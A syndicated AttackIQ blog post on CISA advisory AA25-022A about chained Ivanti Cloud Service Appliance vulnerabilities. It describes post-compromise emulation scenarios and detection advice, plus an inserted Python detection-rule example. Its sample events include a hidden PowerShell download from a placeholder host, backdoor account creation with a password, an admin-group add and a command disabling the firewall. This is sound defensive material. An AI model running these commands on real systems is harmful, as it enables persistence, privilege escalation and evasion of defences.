
Response to CISA Advisory (AA25-022A): Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications
Cybersecurity Advisory
Published
January 24, 2025
AttackIQ has released a new assessment template in response to the CISA Advisory (AA25-022A) published on January 22, 2025, which details the exploitation of vulnerabilities discovered in Ivanti Cloud Service Appliances during September 2024.
On January 22, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA) in response to the exploitation of vulnerabilities in Ivanti Cloud Service Appliances during September 2024.
According to CISA and trusted third-party incident response data, threat actors chained multiple vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells in victim networks. In one confirmed compromise, the actors moved laterally to two additional servers.
The actors’ primary exploit paths were two vulnerability chains:
- One exploit chain leveraged CVE-2024-8963, an administrative bypass vulnerability, in conjunction with CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.
- The other exploited CVE-2024-8963 in conjunction with CVE-2024-9379, a SQL injection vulnerability.
All four vulnerabilities affect Ivanti CSA 4.6x versions before 519, and two of them (CVE-2024-9379 and CVE-2024-9380) also affect CSA versions 5.0.1 and below. According to Ivanti, these CVEs have not been exploited in version 5.0.
AttackIQ has released a new assessment template that includes the post-compromise Tactics, Techniques and Procedures (TTPs) exhibited by these adversaries to help customers test their security controls and their ability to defend against sophisticated threats.
Validating your security program performance against these behaviors is vital in reducing risk. By using these new assessment templates in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against highly opportunistic and sophisticated adversaries whose activities remain an ongoing threat to various industry sectors worldwide.
- Assess their security posture against activities focused on exploiting publicly exposed vulnerabilities.
- Continuously validate detection and prevention pipelines against a threat that performs vulnerability exploitation activities.
[CISA AA25-022A] Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications
This assessment template contains the post-compromise Tactics, Techniques, and Procedures (TTPs) and the tools employed by the adversaries during these activities.
It is based on the Cybersecurity Advisory (CSA) released by CISA on January 22, 2025, and a report published by Fortinet on October 11, 2024.
1. Persistence
Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.
Create Account: Local Account: This scenario creates a new local account with the name mssqlsvc and password Msqlsvc123$% using net user.
2. Privilege Escalation
Consists of techniques that adversaries use to gain higher-level permissions on a system or network.
Account Manipulation: Additional Local or Domain Groups (T1098.007): This scenario adds a local user to the local Administrators group using the net localgroup command.
3. Defense Evasion
Consists of techniques that adversaries use to avoid detection throughout their compromise.
Impair Defenses: Disable or Modify System Firewall (T1562.004): This scenario temporarily disables the Windows Firewall using the netsh advfirewall utility.
4. Command and Control
Consists of techniques that adversaries may use to communicate with systems under their control within a victim network.
Ingress Tool Transfer (T1105): This scenario downloads a known malicious payload to memory and saves it to disk, as two separate scenarios, to test network and endpoint controls and their ability to prevent the delivery of such payloads.
Protocol Tunneling (T1572): This scenario uses the nslookup command available in Windows systems to resolve a domain via the Domain Name System (DNS).
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Review CISA’s Patching and Detection Recommendations:
CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.
2. Ingress Tool Transfer (T1105):
This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.
2a. Detection
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
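The signature above, evaluated over process-creation events and generalized to the template's other scenarios (the net user, net localgroup and netsh advfirewall commands from sections 1 to 3), as an added Python example that is not part of the original post or AttackIQ's platform. The rule names, the event format, the sample command lines and the exact netsh arguments are assumptions.

```python
# Added example (not AttackIQ's code): the page's PowerShell signature plus
# command-line rules for the template's other scenarios, run over constructed
# process-creation events. Rule names, event shape and samples are assumptions.
RULES = {
    # Page's signature: (cmd.exe OR powershell.exe) AND
    # ((IWR OR Invoke-WebRequest) AND DownloadData AND Hidden), case-insensitive.
    "T1105 ingress tool transfer": (
        {"cmd.exe", "powershell.exe"},
        [["iwr", "invoke-webrequest"], ["downloaddata"], ["hidden"]]),
    # net user <name> <password> /add (Create Account: Local Account scenario).
    "Create Account: Local Account": (
        {"cmd.exe", "net.exe", "net1.exe"}, [["net user", "net1 user"], ["/add"]]),
    # net localgroup Administrators <name> /add (T1098.007 scenario).
    "T1098.007 local admin group add": (
        {"cmd.exe", "net.exe", "net1.exe"},
        [["localgroup"], ["administrators"], ["/add"]]),
    # netsh advfirewall set allprofiles state off: assumed form of the T1562.004
    # scenario; the page names only the utility, not the exact arguments.
    "T1562.004 firewall disabled": (
        {"cmd.exe", "netsh.exe"}, [["advfirewall"], ["state off"]]),
}

def matches(rule, process, cmdline):
    """True when the process name is allowed and every OR-group has a term present."""
    procs, groups = rule
    if process.lower() not in procs:
        return False
    text = cmdline.lower()
    return all(any(term in text for term in group) for group in groups)

def evaluate(events):
    """Return (event index, rule name) for each rule an event trips, in order."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items()
            if matches(rule, ev["process"], ev["cmdline"])]

# Constructed process-creation events; URLs and names are placeholders.
SAMPLE_EVENTS = [
    {"process": "powershell.exe", "cmdline": 'powershell -w Hidden -c "IWR http://update.example.test/s '
     "-OutFile s; (New-Object Net.WebClient).DownloadData('http://update.example.test/a.bin')\""},
    {"process": "powershell.exe",  # no Hidden, no DownloadData: the AND must not fire
     "cmdline": 'powershell -c "Invoke-WebRequest -Uri https://update.example.test/p.msi -OutFile p.msi"'},
    {"process": "cmd.exe", "cmdline": "cmd /c net user mssqlsvc Msqlsvc123$% /add"},
    {"process": "net.exe", "cmdline": "net localgroup Administrators mssqlsvc /add"},
    {"process": "netsh.exe", "cmdline": "netsh advfirewall set allprofiles state off"},
    {"process": "netsh.exe", "cmdline": "netsh advfirewall show allprofiles state"},  # benign query
]
```

Running evaluate(SAMPLE_EVENTS) flags events 0, 2, 3 and 4 and leaves the plain Invoke-WebRequest download and the firewall status query alone, which shows why the conjunction in the signature matters for false-positive control.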
2b. Mitigation
MITRE ATT&CK has the following mitigation recommendations.
Wrap-up
In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against a sophisticated threat. With data generated from continuous testing and the use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against sophisticated nation-state actors.
AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.
*** This is a Security Bloggers Network syndicated blog from AttackIQ authored by Francis Guibernau. Read the original post at: https://www.attackiq.com/2025/01/24/response-to-cisa-advisory-aa25-022a/